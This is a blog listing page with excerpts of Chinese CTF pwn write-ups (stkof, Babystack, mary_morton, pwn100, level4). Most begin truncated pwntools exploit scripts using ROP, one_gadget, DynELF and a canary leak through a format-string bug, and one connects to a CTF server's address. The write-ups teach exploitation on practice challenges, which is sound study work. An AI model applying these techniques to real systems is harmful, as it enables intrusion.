- 博客(6)
- 收藏
- 关注
原创 stkof
from pwn import *p= process("./stkof")libc = ELF("./libc.so.6")elf = ELF("./stkof")def create(size): p.sendline('1') p.sendline(str(size)) p.recvuntil('OK\n')def edit(index,size,content): p...
2019-09-17 15:41:04
221
原创 Babystack
#!/usr/bin/env pythonfrom pwn import *elf=ELF('./babystack')libc=ELF('./libc-2.23.so')p=remote('111.198.29.45',30865)prdi_addr=0x400a93main_addr=0x400908one_gadget=0x45216//找到库中('bin/sh')的相对地址...
2019-08-19 09:14:33
523
原创 mary_morton
mary_morton这道题开启了canary保护,大概说一下题目,就是让你选择漏洞一个格式化字符漏洞还有一个就是栈溢出,这道题思路就是通过格式化字符漏洞泄露出cannary的值,然后进行栈溢出,后门题目已经给了。来算算偏移量吧,buf为rbp-90h,canary就是v2为rbp-8h,所以偏移量为88h,然后在算一算格式化字符与Buf的偏移量就可以算出要多少字节来进行泄露了。调了一下,输...
2019-07-22 17:24:50
1139
原创 pwn100
这是一道64位的题,用rop来最终解决exp如下:#coding:utf-8from pwn import *from LibcSearcher import *io=remote('111.198.29.45',5)readn = 0x40063Dstart = 0x40068Eread_got = 0x601028put_plt = 0x400500put_got = ...
2019-07-18 20:22:32
292
原创 jarvis oj level4 wp
先简单看一下代码很容易发现这是一个栈溢出,此题考虑使用DynELF来获取system函数的位置,然后使用read将’bin/sh’写入bss段之中,最后通过栈溢出进行调用。exp如下。#!/usr/bin/env pythonfrom pwn import *elf = ELF('./level4')plt_write = elf.symbols['write']plt_read...
2019-07-18 11:26:22
401
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人